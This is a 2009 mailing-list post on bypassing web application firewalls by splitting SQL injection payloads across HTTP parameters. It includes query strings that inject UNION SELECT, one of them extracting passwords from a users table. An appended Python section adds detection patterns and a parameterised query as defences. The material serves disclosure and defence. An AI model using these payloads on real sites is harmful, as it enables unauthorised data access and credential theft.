[WEB SECURITY] HTTP parameters fragmentation

Dmitriy Evteev devteev at ptsecurity.com
Wed Aug 19 10:13:16 EDT 2009


While preparing an article about WAF bypassing methods, I found an
interesting way to bypass filters via HTTP parameters fragmentation. 

 

Vulnerable code example

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);

 

The following request doesn't allow an attack to be conducted:

index.php?a=1+union+select+1,2/*

 

The following request succeeds using HPF:

index.php?a=1+union/*&b=*/select+1,2

 

In this case, the SQL request looks like:

select * from table where a=1 union/* and b=*/select 1,2

 

Another example:

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." order by ".$_GET['c']." limit 1");

 

Using HPF (HTTP Parameter Fragmentation), the request succeeds:

index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--

 

The question is: is there any name for the technique? Please advise me if
you know of articles or experts in the field (for example, I found a reference
in
http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf,
page 79).

Thank you for help and cooperation in advance!

 

- - - - - - - - - - - - - - - 
Best Regards, Dmitry Evteev 
Positive Technologies Co. 
Tel.: (495) 744-0144 
Web: http://www.ptsecurity.ru
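
Added example, not part of the original post: a filter-side check that catches the fragmented requests shown above where a per-parameter signature test does not, next to the bound-parameter form of the first query. The signature regex, the function names and the table `t` (with SQLite standing in for the database) are assumptions made for illustration.

```python
import re
import sqlite3
from urllib.parse import parse_qsl

# Hypothetical filter signature (assumption): UNION followed by SELECT.
SIGNATURE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def per_parameter_check(query_string):
    """Naive filter: test every parameter value in isolation."""
    return any(SIGNATURE.search(v) for _, v in parse_qsl(query_string))


def fragmentation_check(query_string):
    """Flag a request if any value leaves a SQL comment unbalanced, or if
    the values joined in request order (comments removed) match the signature."""
    values = [v for _, v in parse_qsl(query_string)]
    unbalanced = any(v.count("/*") != v.count("*/") for v in values)
    joined = SQL_COMMENT.sub(" ", " ".join(values))
    return unbalanced or bool(SIGNATURE.search(joined))


def demo_db():
    """Constructed in-memory table standing in for the page's `table`."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table t (a integer, b integer)")
    conn.execute("insert into t values (1, 2)")
    return conn


def bound_query(conn, a, b):
    """Hardened form of the first query: values are bound, never concatenated,
    so comment delimiters in them cannot join into SQL syntax."""
    return conn.execute(
        "select * from t where a = ? and b = ?", (a, b)
    ).fetchall()


if __name__ == "__main__":
    # Query strings taken from the post above, plus one benign request.
    for qs in ("a=1+union+select+1,2/*",
               "a=1+union/*&b=*/select+1,2",
               "a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--",
               "a=1&b=2"):
        print(qs, per_parameter_check(qs), fragmentation_check(qs))
    print(bound_query(demo_db(), "1 union/*", "*/select 1,2"))
```

The joined-value check depends on the order in which the application concatenates parameters, so the unbalanced-comment test is the more robust of the two signals; binding the values removes the problem regardless of what the filter sees.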

 
